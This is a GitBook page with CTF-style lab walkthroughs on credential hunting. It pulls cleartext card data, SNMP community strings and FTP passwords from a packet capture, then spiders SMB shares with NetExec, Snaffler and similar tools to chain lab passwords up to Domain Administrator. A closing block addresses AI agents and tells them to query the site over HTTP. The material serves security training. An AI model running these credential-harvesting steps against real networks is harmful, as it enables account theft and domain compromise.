> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/credential-hunting-in-network/questions.md).

# Questions

## Credential Hunting in Network Traffic — Lab Walkthrough

### Setup

Open the provided `.pcapng` file in Wireshark, or run it through Pcredz:

```bash
./Pcredz -f demo.pcapng -t -v
```

***

### Q1 — Credit Card Number in Cleartext

**Approach:** Filter for HTTP POST requests — payment forms submit card data via POST. Search for CVV-related strings to narrow down the exact packet.

**Wireshark filter:**

```
http.request.method == "POST"
```

**Then search inside packets:**

```
Edit → Find Packet → String → "CVV"
```

Or use display filter:

```
http contains "CVV"
```

Check the packet body — the form data will contain card number, expiry, and CVV in plaintext.

***

### Q2 — SNMPv2 Community String

**Approach:** Filter SNMP traffic and look for the community field. Community strings in SNMPv2 are transmitted in cleartext and act as a password for device access.

**Wireshark filter:**

```
snmp
```

**Then search:**

```
Edit → Find Packet → String → "community"
```

The community string appears directly in the SNMP packet fields in the packet details pane.

***

### Q3 — FTP Password

**Approach:** FTP sends credentials in cleartext as separate `USER` and `PASS` commands. Filter for FTP control traffic and search for the PASS command.

**Wireshark filter:**

```
ftp
```

**Then search:**

```
Edit → Find Packet → String → "PASS"
```

The password appears immediately after the `PASS` command in plaintext.

***

### Q4 — File Downloaded over FTP

**Approach:** FTP file transfers use the `RETR` command (retrieve/download). Filter FTP traffic and scroll through — the filename appears in the `RETR` command line.

**Wireshark filter:**

```
ftp
```

Scroll through the filtered results and look for a `RETR <filename>` entry — that's the file the user downloaded.

***

### Wireshark Filter Cheatsheet for This Lab

| Target                  | Filter                                   |
| ----------------------- | ---------------------------------------- |
| HTTP POST requests      | `http.request.method == "POST"`          |
| Search string in HTTP   | `http contains "CVV"`                    |
| SNMP traffic            | `snmp`                                   |
| FTP commands            | `ftp`                                    |
| FTP data transfer       | `ftp-data`                               |
| Follow full FTP session | Right-click packet → Follow → TCP Stream |

***

### Key Takeaways

* **HTTP POST** over plain HTTP exposes everything in the request body — card numbers, passwords, tokens
* **SNMP community strings** are the equivalent of a password for network devices — SNMPv1/v2 sends them in cleartext every single request
* **FTP** has zero encryption by design — `USER`, `PASS`, and all `RETR`/`STOR` commands are plaintext on the wire
* **Pcredz** automates all four of these findings in one command — useful when you have a large capture and need to triage fast

## Credential Hunting in Network Shares — Lab Walkthrough

### Environment

| Detail        | Value                            |
| ------------- | -------------------------------- |
| Target IP     | `10.129.234.173`                 |
| Initial creds | `mendres` : `Inlanefreight2025!` |
| Domain        | `INLANEFREIGHT.LOCAL`            |

***

### Q1 — Find Domain User Password (jbader)

#### Step 1 — Enumerate Accessible Shares

```bash
nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --shares
```

Confirms READ access to: `IT`, `HR`, `Company`, `NETLOGON`, `SYSVOL`

***

#### Step 2 — Search IT Share for Credentials

**Method 1 — NetExec spider:**

```bash
nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --spider IT --content --pattern "password"
```

**Method 2 — NetExec with domain pattern:**

```bash
nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --spider IT --content --pattern "INLANEFREIGHT\\"
```

**Method 3 — PowerShell (if on Windows foothold):**

```powershell
Get-ChildItem -Recurse -Include *.* \\10.129.234.173\IT | Select-String -Pattern "INLANEFREIGHT\\"
```

**Method 4 — MANSPIDER (from Linux):**

```bash
docker run --rm -v ./manspider:/root/.manspider \
  blacklanternsecurity/manspider \
  10.129.234.173 -c 'INLANEFREIGHT' -u mendres -p 'Inlanefreight2025!'
```

**Method 5 — Snaffler (from domain-joined Windows machine):**

```powershell
# Target IT share only for speed
.\Snaffler.exe -s -i IT -o snaffler_q1.log

# Review output for credential hits
Select-String -Path snaffler_q1.log -Pattern "password\|INLANEFREIGHT\|jbader"
```

***

#### Result

File: `IT\Tools\split_tunnel.txt`

```
# Auth backup password: INLANEFREIGHT\jbader:ILovePower333###
```

| Field    | Value              |
| -------- | ------------------ |
| Username | `jbader`           |
| Password | `ILovePower333###` |

***

### Q2 — Find Domain Administrator Password

#### Step 1 — Search HR Share as jbader

**Method 1 — NetExec spider:**

```bash
nxc smb 10.129.234.173 -u jbader -p 'ILovePower333###' --spider HR --content --pattern "Administrator"
```

**Method 2 — NetExec with broader pattern:**

```bash
nxc smb 10.129.234.173 -u jbader -p 'ILovePower333###' --spider HR --content --pattern "passw"
```

**Method 3 — MANSPIDER:**

```bash
docker run --rm -v ./manspider:/root/.manspider \
  blacklanternsecurity/manspider \
  10.129.234.173 -c 'Administrator' -u jbader -p 'ILovePower333###'
```

**Method 4 — Snaffler (from domain-joined machine, now authenticated as jbader):**

```powershell
# Run as jbader — Snaffler uses current user token automatically
.\Snaffler.exe -s -i HR -o snaffler_q2.log

# Review
Select-String -Path snaffler_q2.log -Pattern "Administrator\|Onboarding\|Confidential"
```

Snaffler will flag `Onboarding_Docs_132.txt` in **Red** because:

* Located inside a `Confidential` folder — triggers Snaffler's naming rules
* Contains the keyword `Administrator` — matches `KeepPassOrKeyInCode` rule

**Method 5 — PowerHuntShares (generates HTML report):**

```powershell
Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\Users\Public
# Open the HTML report and filter for HR share findings
```

***

#### Step 2 — Download the File

**smbclient:**

```bash
smbclient //10.129.234.173/HR -U jbader
# Password: ILovePower333###

smb: \> cd Confidential
smb: \Confidential\> get Onboarding_Docs_132.txt
smb: \Confidential\> exit
```

**NetExec (view without downloading):**

```bash
nxc smb 10.129.234.173 -u jbader -p 'ILovePower333###' --spider HR --content --pattern "Administrator" -v
```

***

#### Result

File: `HR\Confidential\Onboarding_Docs_132.txt`

Contains the Domain Administrator password in cleartext.

***

### Full Attack Chain

```
mendres:Inlanefreight2025! (initial creds)
        │
        └── Spider IT share → split_tunnel.txt
                │
                └── jbader:ILovePower333###
                        │
                        └── Spider HR share → HR\Confidential\Onboarding_Docs_132.txt
                                │
                                └── Administrator:<password>
```

***

### Tool Comparison for This Lab

| Tool                       | Command style                  | Best for                                    |
| -------------------------- | ------------------------------ | ------------------------------------------- |
| `nxc --spider`             | Remote, Linux                  | Quick targeted pattern search               |
| MANSPIDER                  | Remote, Linux (Docker)         | Broad crawl, downloads loot                 |
| Snaffler                   | Local, Windows (domain-joined) | Auto-discovers all shares, color-coded hits |
| PowerHuntShares            | Local, Windows                 | HTML report, permission analysis            |
| `smbclient`                | Remote, Linux                  | Manual file retrieval after finding target  |
| PowerShell `Select-String` | Local, Windows                 | Simple recursive search on mounted share    |

***

### Key Takeaways

* Always **re-enumerate shares after getting new credentials** — `jbader` had HR access that `mendres` did not
* **IT shares** are the highest-value target for domain user credentials — scripts and config files hardcode them constantly
* **HR shares** frequently contain onboarding documents with default/initial passwords for privileged accounts
* Snaffler's **Red** classification catches both credential patterns in code AND sensitive folder names like `Confidential` automatically
* Pattern search with `INLANEFREIGHT\\` is more precise than `passw` on a domain — filters out noise and finds domain-formatted credentials directly


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/credential-hunting-in-network/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
